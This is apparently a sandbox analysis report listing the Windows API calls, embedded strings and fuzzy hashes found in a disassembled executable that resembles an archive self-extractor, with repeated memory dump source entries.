                                                                                                                                        Similarity
                                                                                                                                        • API ID: File
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 749574446-0
                                                                                                                                        APIs
                                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,007A927A,007D2120,00000000,007D3122,00000006), ref: 007A9027
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1611563598-0
                                                                                                                                        APIs
                                                                                                                                        • CloseHandle.KERNELBASE(000000FF,?,?,00799473), ref: 007994BE
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007912E7: GetDlgItem.USER32(00000000,00003021), ref: 0079132B
                                                                                                                                          • Part of subcall function 007912E7: SetWindowTextW.USER32(00000000,007C02E4), ref: 00791341
                                                                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 007AA5C8
                                                                                                                                        • EndDialog.USER32(?,00000006), ref: 007AA5DB
                                                                                                                                        • GetDlgItem.USER32(?,0000006C), ref: 007AA5F7
                                                                                                                                        • SetFocus.USER32(00000000), ref: 007AA5FE
                                                                                                                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 007AA63E
                                                                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 007AA671
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 007AA687
                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007AA6A5
                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 007AA6B5
                                                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 007AA6D2
                                                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 007AA6F0
                                                                                                                                          • Part of subcall function 0079D142: LoadStringW.USER32(?,?,00000200,?), ref: 0079D187
                                                                                                                                          • Part of subcall function 0079D142: LoadStringW.USER32(?,?,00000200,?), ref: 0079D19D
                                                                                                                                        • _swprintf.LIBCMT ref: 007AA720
                                                                                                                                          • Part of subcall function 00793F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00793F6E
                                                                                                                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 007AA733
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007AA736
                                                                                                                                        • _swprintf.LIBCMT ref: 007AA791
                                                                                                                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 007AA7A4
                                                                                                                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 007AA7BA
                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 007AA7DA
                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 007AA7EA
                                                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 007AA804
                                                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 007AA81C
                                                                                                                                        • _swprintf.LIBCMT ref: 007AA84D
                                                                                                                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 007AA860
                                                                                                                                        • _swprintf.LIBCMT ref: 007AA8B0
                                                                                                                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 007AA8C3
                                                                                                                                          • Part of subcall function 007A932F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 007A9355
                                                                                                                                          • Part of subcall function 007A932F: GetNumberFormatW.KERNEL32(00000400,00000000,?,007CA154,?,?), ref: 007A93A4
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                        • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                        • API String ID: 3227067027-1840816070
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00797075
                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 007971D5
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007971E5
                                                                                                                                          • Part of subcall function 00797A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00797AAC
                                                                                                                                          • Part of subcall function 00797A9D: GetLastError.KERNEL32 ref: 00797AF2
                                                                                                                                          • Part of subcall function 00797A9D: CloseHandle.KERNEL32(?), ref: 00797B01
                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 007971F0
                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 007972FE
                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 0079732A
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0079733C
                                                                                                                                        • GetLastError.KERNEL32(00000015,00000000,?), ref: 0079734C
                                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00797398
                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 007973C0
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                        • API String ID: 3935142422-3508440684
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog_memcmp
                                                                                                                                        • String ID: CMT$h%u$hc%u
                                                                                                                                        • API String ID: 3004599000-3282847064
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __floor_pentium4
                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00792775
                                                                                                                                        • _strlen.LIBCMT ref: 00792CFF
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00792E56
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                                                                                                        • String ID: CMT
                                                                                                                                        • API String ID: 3741668355-2756464174
                                                                                                                                        APIs
                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 007B5C4B
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 007B5C55
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 007B5C62
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 007A9355
                                                                                                                                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,007CA154,?,?), ref: 007A93A4
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FormatInfoLocaleNumber
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2169056816-0
                                                                                                                                        APIs
                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,007BE8CF,?,?,00000008,?,?,007BE56F,00000000), ref: 007BEB01
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: gj
                                                                                                                                        • API String ID: 0-4203073231
                                                                                                                                        APIs
                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 0079A905
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Version
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1889659487-0
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001DBCF,007AD604), ref: 007ADBC8
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 8|
                                                                                                                                        • API String ID: 0-531956219
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                        • Opcode ID: 2d684ad6d5272e10f11a3e9f1bff15b2c0cceb0f5c7d33d8629cb6fdfd23546e
                                                                                                                                        • Instruction ID: 85dc22007bd64cab6c12d9b76c4fd071ab67eba76fd5cb04a02c258a8689ad37
                                                                                                                                        • Opcode Fuzzy Hash: 2d684ad6d5272e10f11a3e9f1bff15b2c0cceb0f5c7d33d8629cb6fdfd23546e
                                                                                                                                        • Instruction Fuzzy Hash: D8A02430103140CF53004F355F0730D3FD4F5053C0705C01C5004C5130D73C40004745
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                                                                                                                        • Instruction ID: 2117d31aee524333c0442ba45b3e49393edf297c435f80f07c5f8e323e9ff7d1
                                                                                                                                        • Opcode Fuzzy Hash: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                                                                                                                        • Instruction Fuzzy Hash: AB62E971604B85DFCB29CF38C8906BAB7E1AFD6304F04866DD99A8F346D638E945CB50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                                                                                                                        • Instruction ID: 4485450ec29ef61aad0be87ab05e250e40e368027ce5b5a989f7c0b80145f5d9
                                                                                                                                        • Opcode Fuzzy Hash: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                                                                                                                        • Instruction Fuzzy Hash: 6C6213B16047869FC719CF28C8905B9BBE0FB96304F18876DD99687742E738F955CB80
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                                                                                                                        • Instruction ID: 549a0903f30c6d4b82d56b7a05a8d9e7d1d59bde3fb7ed1294cd23b872e10c39
                                                                                                                                        • Opcode Fuzzy Hash: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                                                                                                                        • Instruction Fuzzy Hash: E85249B26047019FC758CF18C891A6AF7E1FFC8304F49892DF5969B255D734E919CB82
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 000614300bbc084e730df5b79e8a30e1091d8729c9733be97e5edc6764652691
                                                                                                                                        • Instruction ID: 3c73c83ee1f1ecb67038fd10e63d6926d6d8237ad225baf31f2bd87ad51db931
                                                                                                                                        • Opcode Fuzzy Hash: 000614300bbc084e730df5b79e8a30e1091d8729c9733be97e5edc6764652691
                                                                                                                                        • Instruction Fuzzy Hash: 2A12D5B1604B068FC728CF28C8D4679B7E1FF95304F148A2DE597C7A81E778A895CB45
Memory Dump Source
• Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 692e6ae63397fef501387f6de6a31a1502ee1e504e2283c02cc8111dd741a8db
                                                                                                                                        • Instruction ID: f7f32cd597bf2d09755481bf1151f8b5248c2cfb1b63a985878a04b6c43b3af6
                                                                                                                                        • Opcode Fuzzy Hash: 692e6ae63397fef501387f6de6a31a1502ee1e504e2283c02cc8111dd741a8db
                                                                                                                                        • Instruction Fuzzy Hash: EBF19971A083458FCB14CF29E68866ABBE2FFC9714F144A2EF48687355D738E905CB52
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                        • Instruction ID: 6d5bc67080287d2babce9e3ef69cf636c550ebdb312cec9257aec2757315f60b
                                                                                                                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                        • Instruction Fuzzy Hash: FAC16D362051930ADB2D46BA857423EBEA16EE37B131A077ED4B7CB1D4FF28D524D620
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                        • Instruction ID: d396e7518d4cf255f1540f23aa8d568a10384a90f9806ff5cd340ecfc7b770dc
                                                                                                                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                        • Instruction Fuzzy Hash: 35C170362091930ADF2D46BAC57413EBEA16AE37B131A077DD8B6CB1D5FF28C524D620
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                        • Instruction ID: bc35c5841dcd3a59adf2d639bcaba822454e5be64e58cc84435a06efb543e6e1
                                                                                                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                        • Instruction Fuzzy Hash: D3C16E362051930ADF6D86BA857413EBEA16AE37B131A077DD8B6CB1D4FF28C524D620
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                        • Instruction ID: ec8e9f2d0c43aa9a62996170bec558de6f343d7e776103d4c54ab6a2a52ca814
                                                                                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                        • Instruction Fuzzy Hash: EEC18E362090930ADF6D46BAC57413FBEA16AE37B131A077DE4B6CB1C5FF28C5249620
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fc9d7e2b6bc5dd12dddbc66145287a0d1581cdd09b3adf6fc649f582f5564823
                                                                                                                                        • Instruction ID: 734c0e2a77d7ce083f6e612aea2fc59f3c173648279f37e4c367109fbbb8add7
                                                                                                                                        • Opcode Fuzzy Hash: fc9d7e2b6bc5dd12dddbc66145287a0d1581cdd09b3adf6fc649f582f5564823
                                                                                                                                        • Instruction Fuzzy Hash: 3DE148755093808FC344CF29D89496ABBF0EFCA300F89895EF5D597362C238E955CBA6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                                                                        • Instruction ID: ffab465961c3e3ff09ecdca39d940ae278f02557929bd80425a938c39ac01441
                                                                                                                                        • Opcode Fuzzy Hash: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                                                                        • Instruction Fuzzy Hash: E59149B0204745DBDB24EF6CD899BBE73D5ABD2300F100A2DF59687283EA7C9645C752
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cd278409d6a8e2949a186f0bbcac686eac1075f4d8c5a532710484d97cea2f8e
                                                                                                                                        • Instruction ID: af8af4de6fd8d7b19c8df95345cd6e39c1228d0fa51eef00c956aca53f63204e
                                                                                                                                        • Opcode Fuzzy Hash: cd278409d6a8e2949a186f0bbcac686eac1075f4d8c5a532710484d97cea2f8e
                                                                                                                                        • Instruction Fuzzy Hash: CD618BB1702708A6DF385E288859BFF7794EF15740F240919E842DB293EA1DED878366
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                                                                                                                        • Instruction ID: 35033b9f2e48e3ca7c6a0d581c6d85644f2937860394d45504f5002426d1285b
                                                                                                                                        • Opcode Fuzzy Hash: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                                                                                                                        • Instruction Fuzzy Hash: 8B7129712047859BDF24DF6CD8D8BAD37D1ABD3304F000A2DF9868B282DA7C9A858756
Memory Dump Source
• Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
